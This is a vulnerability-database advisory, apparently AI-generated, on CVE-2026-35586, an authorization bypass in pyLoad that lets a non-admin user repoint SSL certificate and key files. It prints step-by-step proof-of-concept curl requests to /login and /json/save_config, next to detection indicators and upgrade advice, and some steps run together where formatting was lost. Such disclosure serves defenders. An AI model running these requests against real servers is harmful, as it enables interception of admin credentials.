
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-35586 is an authorization bypass vulnerability in pyLoad (pyload-ng), a free and open-source Python-based download manager. The flaw exists in the set_config_value() function, where the ADMIN_ONLY_CORE_OPTIONS set references incorrect SSL option names (ssl_cert, ssl_key) instead of the actual configuration names (ssl_certfile, ssl_keyfile), causing the admin-only authorization check to always evaluate to False. This allows any authenticated user with SETTINGS permission to overwrite SSL certificate and key file paths. All versions up to and including 0.5.0b3.dev96 are affected; the fix is available in 0.5.0b3.dev97. It carries a CVSS v3.1 base score of 6.8 (Medium/High) (GitHub Advisory).
The root cause is CWE-863 (Incorrect Authorization): the ADMIN_ONLY_CORE_OPTIONS set in src/pyload/core/api/__init__.py (lines 237–248) contains ("webui", "ssl_cert") and ("webui", "ssl_key"), while the actual configuration options defined in src/pyload/core/config/default.cfg are named ssl_certfile, ssl_keyfile, and ssl_certchain. The authorization check at line 267 compares the incoming (category, option) tuple against this set; because the names never match, the guard always passes, and config.set() writes the attacker-supplied file path. The value is processed via os.path.realpath() in parser.py but undergoes no further validation. On the next server restart with SSL enabled, webserver_thread.py loads the attacker-controlled certificate and key paths directly into the SSL adapter (GitHub Advisory).
A non-admin authenticated user with SETTINGS permission can redirect the pyLoad HTTPS server to use attacker-controlled SSL certificate and key files. Upon server restart, all HTTPS traffic — including admin credentials and session tokens — is encrypted under the attacker's certificate, enabling man-in-the-middle (MitM) interception and decryption of all communications. Intercepted admin credentials can then be used to escalate to full administrative access, enabling complete configuration tampering and further lateral movement within the environment (GitHub Advisory).
A proof-of-concept exploit is publicly available in the GitHub Security Advisory, consisting of a complete step-by-step attack guide using curl commands targeting the /login and /json/save_config endpoints. Exploitation requires a low-privileged authenticated account with SETTINGS permission and the ability to place files on the server filesystem (potentially via pyLoad's own download functionality). There is no evidence of in-the-wild exploitation at this time. The EPSS score is approximately 0.017% (0.000170), and the vulnerability is not listed in the CISA KEV catalog (GitHub Advisory).
/tmp/attacker.crt and /tmp/attacker.key).curl -c cookies.txt -X POST 'http://localhost:8000/login' \
-d 'username=settingsuser&password=password123'/json/save_config to replace the SSL certificate file path:curl -b cookies.txt -X POST 'http://localhost:8000/json/save_config' \
-H 'Content-Type: application/json' \
-d '{"category": "core", "config": {"webui|ssl_certfile": "/tmp/attacker.crt"}}'curl -b cookies.txt -X POST 'http://localhost:8000/json/save_config' \
-H 'Content-Type: application/json' \
-d '{"category": "core", "config": {"webui|ssl_keyfile": "/tmp/attacker.key"}}'curl -b cookies.txt -X POST 'http://localhost:8000/json/save_config' \
-H 'Content-Type: application/json' \
-d '{"category": "core", "config": {"webui|ssl_certchain": "/tmp/attacker-chain.crt"}}'/json/save_config from a non-admin account with payloads referencing ssl_certfile, ssl_keyfile, or ssl_certchain; configuration change log entries for webui SSL options made by a non-admin user..crt, .key, or .pem files in world-writable directories (e.g., /tmp/) on the pyLoad server; modification timestamps on pyLoad's SSL configuration files (ssl.crt, ssl.key) inconsistent with legitimate admin activity.pyload.cfg or equivalent) showing ssl_certfile, ssl_keyfile, or ssl_certchain pointing to paths outside the expected certificate directory (GitHub Advisory).Upgrade pyLoad (pyload-ng) to version 0.5.0b3.dev97 or later, which corrects the option names in ADMIN_ONLY_CORE_OPTIONS to ssl_certfile and ssl_keyfile and adds the missing ssl_certchain entry. As an interim workaround, restrict the SETTINGS permission to trusted administrators only, eliminating the attack surface. Additionally, monitor SSL certificate configuration changes for unauthorized modifications and verify SSL certificate integrity in production deployments after any server restart (GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."